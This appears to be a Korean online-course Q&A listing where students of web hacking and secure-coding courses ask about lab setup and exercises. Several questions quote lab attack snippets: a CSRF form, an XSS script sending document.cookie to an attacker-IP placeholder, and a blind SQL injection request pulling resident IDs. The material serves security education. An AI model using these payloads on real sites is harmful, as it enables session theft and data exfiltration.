묻고 답해요
160만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
mysql 접속 에러
mysql 접속이 계속 오류가 납니다. 비밀번호 'apmsetup'으로 계속 시도해도 오류가 납니다ㅠㅠ구글링해서 나온 방법들도 안 통해서 질문 남깁니다.. !
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
test' 부분이 실행되지않습니다.
이렇게 off로 바꾸고 재실행 하려고 apacheMonitor를 키려고하는데 이렇게 뜹니다! 그리고 test' 라고 나오는게 아니라 test\' 라고 나옵니다..
-
미해결리눅스 커널 해킹. A부터 Z까지
Stack based BOF 강의에서 질문입니다.
이 강의 전의 기존 ROP방식에서는카나리 다음에 레지스터값들이 저장안되었는데 이번에는 왜 저장될까요?또 위 사진 rop[i++] 14, 15번째(swapgs_restore... 바로 밑)는 왜 0x41414141로 될까요?이것도 저번 강의랑 조금 달라 질문드립니다.
-
미해결웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
monitor 이 안 켜져요
계속 이 메세지만 뜨고 모니터가 열리지 않습니다
-
해결됨반드시 알고 넘어가야 할 웹 기술 기초편
자원을 지정하는 url 13:00
이 url에서 왜 첫 번째 &가 파라미터 값 대입인가요? =가 파라미터 값 대입 아닌가요?
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
한글 설치 저장소 위치
한글 깨짐을 위해nano /etc/apt/sources.list 에서deb http://httpredir.debian.org/debian jessie main non-free contrib 를작성했지만 다음과 같은 오류가 발생합니다.같은 질문을 하신 다른 분에 적힌 답변을 참고해보니강의해주신 때와 시간이 달라 다른 저장소 위치를 작성해야한다는 글을 보았습니다.어떤 저장소를 작성해야하는지 알 수 있을까요??
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Rule update 문제
Rule update를 하면 Rules tarball download of emerging.rules.tar.gz....이런 문구만 계속 뜨네요인터넷은 연결되어 있는데 왜 안되는걸까요
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Snorby 설치
securityonion에서 Snorby 설치할려고 github 입력해도 timeout 뜨면서 설치가 안되네요..
-
미해결오픈 소스 도구를 활용한 웹 해킹 및 스노트 분석(침해대응)
Marketplace에 beta portScanner가 없습니다.
zap 2.16버전을 다운받았는데 marketpalce에 portscanner, Active scanner rules(alpha) 가 없습니다.
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
인터넷 연결문제
칼리리눅스 ping: connect: Network is unreachablenat 네트워크 설정 다 했는데도 이렇게 뜨네요 정말 모르겠습니다. 할 수 있는건 다 해봤습니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
sql injection 공격이 가능한 순간 다른 기법을 사용하는건 비효율적이지 않나요?
sql injection 공격이 가능하다면union 공격이 제일 효과적이라는 생각이 들었습니다.sql injection 공격이 가능한 순간 다른 기법을 사용하는건 비효율적이지 않나요?blind_Based가 유효한 더 실전적인 케이스가 궁금합니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
리피터 글자가 깨짐현상
리피터로 옮기고 send하면 강사님처럼 문구가 안뜨고 ㅁㅁㅁㅁㅁ ㅁㅁㅁㅁ ㅁㅁㅁㅁ 이렇게 뜹니다 무엇이 원인일련지요,, 환경은 버프스위트 내에 오픈브라우저로 접속했습니다 감사합니다.
-
미해결버그헌팅과 시나리오 모의해킹 전문가 되기
basic pentesting 2.ova IP설정
basic pentesting 2.ova 다운로드 받았는데, IP설정이 안되어 있습니다.IP설정하는 방법 안내 부탁드립니다.아니면, DHCP 설정되어 있는 ova파일 제공 부탁 드립니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
http://127.0.0.1/insecure_website/index.php 접속 에러 문제
이런 warning 에러 문구가 뜹니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
실습6-1] CSRF공격을 통한 게시글 무단작성에서 오류가 발생합니다.
<form action="http://172.30.1.22/insecure_website/action.php" method="POST" enctype="multipart/form-data"><input type="hidden" name="title" value="해커가 무단으로 작성!"><input type="hidden" name="password" value="test"><input type="hidden" name="content" value="해커닷"><input type="hidden" name="mode" value="write"><input type="submit"></form>이내용으로 게시글을 작성하면다음과 같이 나옵니다.actio.php에서 뭘 수정해야 할까요?
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
세션 하이재킹 질문
127.0.0.1/session/session.php?session=test이것으로 rawdata.txt에날짜와 시간/ip주소/test는 잘 출력이 되었습니다.다른 웹브라우저에서 공격자id로 접속해서 다음과 같이 게시판을 작성하였으며 그때 ip주소를 어떻게 할당받는지가 궁금합니다.<script>location.href = "http://공격자ip/session/session.php?session=" + document.cookie</script>이 게시판의 내용은 rawdata.txt에 저장되지 않습니다.무엇이 잘못되었을까요?
-
해결됨모의해킹 실무자가 알려주는, 파일 다운로드 취약점 공격 기법과 실무 사례 분석
JasperException
안녕하세요, 코드를 실행시켰을 때 JasperException 오류가 발생하여 문의드립니다. 구글링 했을 때는 jsp 파일이 java로 변환되고 class 생성하는 과정에서 오류가 난다고 합니다. 그래서 WAS에서 오류를 해결할 수 있다고 하는데, 윈도우즈 환경에서 WAS를 어떻게 접근할 수 있는지 모르겠습니다.또한, WAS 말고도 다른 방법이 있는지 궁금합니다.제 코드와 오류를 첨부하겠습니다.감사합니다.<%@ page contentType="text/html; charset=UTF-8"%> <%@ page import="java.util.*;, java.io.*;" %> <% FileInputStream fis = null; <!-- fileInputStream은 1byte씩 부르게 됨 --> BufferedInputStream bis = null; <!-- 그래서 버퍼드 클래스를 사용하면 버퍼를 이용해서 바이트스트림을 쌓아두고 효율적으로 관리 가능능--> BufferedOutputStream bos = null; String path = "C:\\Program Files\\Apache Software Foundation\\Tomcat 9.0\\webapps\\ROOT\\upload\\image\\"; String org_filename = request.getParameter("org_filename"); <!-- get 메소드를 받아오는 게 아님. 그냥 입력값을 받는 것.--> String real_filename = request.getParameter("real_filename"); if(org_filename = null || real_filename = null) { out.println("<script>alert('파일명이 입력되지 않았습니다.');history.back(-1)</script>"); return; } try { File fd = new File(path + real_filename); if(!fd.exists()) { <!-- 파일이 없으면 --> out.println("<script>alert('파일이 존재하지 않았습니다.');history.back(-1)</script>"); return; } response.setHeader("Content-Type", "application/octect-stream"); <!-- 임의의 파일 --> response.setHeader("Content-Disposition", "attachment; filename=" + org_filename); <!-- 다운받을 때 셋팅되는 파일 이름--> <!-- 파일 -> Byte -> Buffer -> user --> fis = new FileInputStream(fd); <!-- 파일 객체가 들어와도 ㄱㅊ--> bis = new BufferedInputStream(fis); bos = new BufferedOutputStream(response.getOutputStream); byte[] buffer = new byte[1024]; int i = 0; <!-- bis에 있는 값을 buffer로 불러왔는데, 이제 옮길게 없다면 -1이 반환됨 --> while((i=(bis.read(buffer))) != -1) { bos.write(buffer, 0, i); } bos.flush(); } finally { <!-- 객체를 중지시키는 곳--> if(fis != null) <!-- 객체 생성이 제대로 되었다면--> fis.close(); if(bis != null) bis.close(); if(bos != null) bos.close(); } %>오류타입 예외 보고 메시지 org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp 설명 서버가, 해당 요청을 충족시키지 못하게 하는 예기치 않은 조건을 맞닥뜨렸습니다. 예외 org.apache.jasper.JasperException: org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:589) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:425) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 근본 원인 (root cause) org.apache.jasper.JasperException: java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp org.apache.jasper.servlet.JspServletWrapper.getServlet(JspServletWrapper.java:197) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:413) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 근본 원인 (root cause) java.lang.ClassNotFoundException: org.apache.jsp.download1_jsp java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:445) org.apache.jasper.servlet.JasperLoader.loadClass(JasperLoader.java:129) org.apache.jasper.servlet.JasperLoader.loadClass(JasperLoader.java:58) org.apache.jasper.servlet.JspServletWrapper.getServlet(JspServletWrapper.java:192) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:413) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:376) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:324) javax.servlet.http.HttpServlet.service(HttpServlet.java:623) org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:51) 비고 근본 원인(root cause)의 풀 스택 트레이스를, 서버 로그들에서 확인할 수 있습니다.
-
해결됨웹 개발자와 정보보안 입문자가 꼭 알아야 할 웹 해킹 & 시큐어 코딩
실습 2-9] request 수정하고 send를 눌렀는데 검색이 되지 않습니다.
GET /insecure_website/index.php?page=view&idx=14%20and%20length((select+jumin+customer_info+where+id='admin'))=14그 이전까지는 잘되었는데 이부분 부터 계속 안됩니다. 어디가 문제일까요?
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
업데이트 부탁드립니다.
안된다고 하시는 분들이 지금 너무 많습니다 저역시 2주 동안따라해봐도 환경 구성이 되질 않습니다. 지금 따라 하려니깐 되질 않습니다 다운이 받아 지지않는 버전도 있구요 그래서 xampp로 오라클연동하는 방법들을 알려주세요 업로드 해주셔도 감사할것같습니다
-
해결됨Skill-Up! 웹쉘 탐지 솔루션 우회를 위한, 웹쉘 난독화 기법
단순 강의 개설 문의
안녕하세요 강사님 강의가 매우 유익하여 강의랑은 별개의 내용으로 단순 질문이 있습니다.혹시 모바일 앱(IOS, Andriod)에 대한 취약점 진단 강의도 개설하실 의향이 있으실까요?
